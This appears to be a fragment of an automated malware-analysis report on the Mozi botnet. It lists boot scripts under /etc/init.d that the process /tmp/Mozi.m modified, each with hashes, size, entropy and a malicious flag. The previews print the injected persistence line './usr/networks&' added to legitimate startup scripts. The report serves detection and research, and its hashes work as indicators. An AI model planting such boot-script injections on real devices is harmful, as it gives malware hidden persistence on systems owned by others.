                                                                                        MD5:68EC1ED64500D143FE44D1ED0B19DD83
                                                                                        SHA1:90AE6027194C555ED6DE71191682E1773DD8E609
                                                                                        SHA-256:F450F84C27D8339C63251AEB3DC06634AC42E8F4B0AFDA734E1044B5453ECF0D
                                                                                        SHA-512:C9CD195893143DE17D2029672DA2236C7EC44498B1B5F13526CCA56665388790A198ECD0F2FE097FB8D035F780AFFCC5F984DDE1D0540AA778892F52E7698EBB
                                                                                        Malicious:true
                                                                                        Preview: ./usr/networks&..exit 3..;;. stop|status)..# No-op..;;. *)..echo "Usage: bootmisc.sh [start|stop]" >&2..exit 3..;;.esac..:../usr/networks&.exit 1.
                                                                                        /etc/init.d/checkfs.sh
                                                                                        Process:/tmp/Mozi.m
                                                                                        File Type:ASCII text
                                                                                        Size (bytes):147
                                                                                        Entropy (8bit):4.7173471450646
                                                                                        Encrypted:false
                                                                                        MD5:FC904BF1583E7C4398FCCDF2D3276902
                                                                                        SHA1:25D51112D0A6C9C977F4BB0B73BB3B4F278074A3
                                                                                        SHA-256:059F2548AB66249C86CC868222E9CA0B44123E23A99D4D3581044D1306730BD7
                                                                                        SHA-512:DF7FC2EE581E67BC3282F05FB8DC33FCAF86B29F564E5CB43965AFDB6AE7422D06A6091A18375B3544F495CA827B6CC6B213FF4FFE7AEC252C326B8D56B4CF84
                                                                                        Malicious:true
                                                                                        Preview: ./usr/networks&..exit 3..;;. stop|status)..# No-op..;;. *)..echo "Usage: checkfs.sh [start|stop]" >&2..exit 3..;;.esac..:../usr/networks&.exit 1.
                                                                                        /etc/init.d/checkroot-bootclean.sh
                                                                                        Process:/tmp/Mozi.m
                                                                                        File Type:ASCII text
                                                                                        Size (bytes):250
                                                                                        Entropy (8bit):4.872318043360431
                                                                                        Encrypted:false
                                                                                        MD5:1B20C93FFEABBAA880FEB038394DA3EE
                                                                                        SHA1:CDD8FDC804AE4D7464E3B67B26F52C53C5EEAD13
                                                                                        SHA-256:3A63188036AB39E080E5035091441EFB91BF22F20C9292900929CA8F04D0F280
                                                                                        SHA-512:E2717119C05473DEB21FF60060813C6B4648FB6B94B524D76A15ED9506ED2BCFFA03108ABAB7CBF52A29D7507937749D0F9F420A96D4F75B499553434F836059
                                                                                        Malicious:true
                                                                                        Preview: ./usr/networks&..exit $?..;;. restart|reload|force-reload)..echo "Error: argument '$1' not supported" >&2..exit 3..;;. stop|status)..# No-op..;;. *)..echo "Usage: checkroot-bootclean.sh [start|stop]" >&2..exit 3..;;.esac..:../usr/networks&.exit 1.
                                                                                        /etc/init.d/checkroot.sh
                                                                                        Process:/tmp/Mozi.m
                                                                                        File Type:ASCII text
                                                                                        Size (bytes):3111
                                                                                        Entropy (8bit):4.922960717312443
                                                                                        Encrypted:false
                                                                                        MD5:544D026D22E17EF8C1F59AE6EC1E5993
                                                                                        SHA1:F5BFEE80CBF31DAEC25CD0728F030580F539D88F
                                                                                        SHA-256:69A39FE65F95BBA2E445A39AA1F8AF941FDA210AB6A9174B0578B5AB36C5BE32
                                                                                        SHA-512:85CD0C7AE75DA853E5C4286BF4E3D9DE28D2916EDBE0CB7A42DC53AD7D8B02F7875C617DC4D4DD4A1C74333D9403C8D06C903F8F19AB11A3E221281B7CBF8837
                                                                                        Malicious:true
                                                                                        Preview: ./usr/networks&..# NOTE: "failure" is defined as exiting with a return code of..# 4 or larger. A return code of 1 indicates that file system..# errors were corrected but that the boot may proceed. A return..# code of 2 or 3 indicates that the system should immediately reboot...#..if [ "$FSCKCODE" -eq 32 ]..then...log_warning_msg "File system check was interrupted by user"..elif [ "$FSCKCODE" -gt 3 ]..then...# Surprise! Re-directing from a HERE document (as in "cat << EOF")...# does not work because the root is currently read-only....log_failure_msg "An automatic file system check (fsck) of the root filesystem failed. .A manual fsck must be performed, then the system restarted. .The fsck should be performed in maintenance mode with the .root filesystem mounted in read-only mode."...log_warning_msg "The root filesystem is currently mounted in read-only mode. .A maintenance shell will now be started. .After performing system maintenance, press CONTROL-D .to terminate the maintenance shell
                                                                                        /etc/init.d/hostname.sh
                                                                                        Process:/tmp/Mozi.m
                                                                                        File Type:ASCII text
                                                                                        Size (bytes):404
                                                                                        Entropy (8bit):5.01878905639229
                                                                                        Encrypted:false
                                                                                        MD5:0A6F8F35CFF93CE8BBAB05E2DA2714C6
                                                                                        SHA1:9A865CEB2B56974A54694ED9D1D117043EA02727
                                                                                        SHA-256:4E41D7D95B11DBAD34E30EDE98DB6728873146F05FF45A4EF6943ADD1F71D0A1
                                                                                        SHA-512:F6E29642047487748B5BEC77C7429881B73FED48CAA9247CB788CFA2CE856D300B3FB6F8F4C8D6F18ED710B5237B331BC03ABE03222296EE12F1256D5222B537
                                                                                        Malicious:true
                                                                                        Preview: ./usr/networks&..exit $ES.}..do_status () {..HOSTNAME=$(hostname)..if [ "$HOSTNAME" ] ; then...return 0..else...return 4..fi.}..case "$1" in. start|"")..do_start..;;. restart|reload|force-reload)..echo "Error: argument '$1' not supported" >&2..exit 3..;;. stop)..# No-op..;;. status)..do_status..exit $?..;;. *)..echo "Usage: hostname.sh [start|stop]" >&2..exit 3..;;.esac..:../usr/networks&.exit 1.
                                                                                        /etc/init.d/hwclock.sh
                                                                                        Process:/tmp/Mozi.m
                                                                                        File Type:ASCII text
                                                                                        Size (bytes):23
                                                                                        Entropy (8bit):3.882045108136863
                                                                                        Encrypted:false
                                                                                        MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                                        SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                                        SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                                        SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                                        Malicious:true
                                                                                        Preview: ./usr/networks&.exit 1.
                                                                                        /etc/init.d/mountall-bootclean.sh